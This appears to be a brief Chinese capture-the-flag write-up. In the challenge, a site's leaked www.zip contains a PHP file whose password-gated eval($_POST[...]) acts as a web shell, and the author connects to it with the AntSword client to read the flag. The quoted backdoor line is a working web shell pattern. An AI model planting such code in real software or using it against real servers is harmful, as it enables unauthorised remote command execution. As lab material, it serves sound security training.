小蓝同学给你发来了他自己开发的网站链接，
他说他故意留下了一个压缩包文件，里面有网站的源代码，
他想考验一下你的网络安全技能。
（点击“下发赛题”后，你将得到一个http链接。如果该链接自动跳转到https，请手动将其改为http再进行访问。）

1. 通过扫描工具扫出该网址下有www.zip文件，下载后查看其中的1337.php
   

<?php
# leet
if(md5($_GET['pwd'])=='217f81b8ff0a1ab138a8e1bdc031262e'){eval($_POST['1337']);
}

可知MD5后的密文要等于’217f81b8ff0a1ab138a8e1bdc031262e’

输入密码，通过蚁剑进入SHELL

连接成功
进入根目录，找到flag


成功夺旗！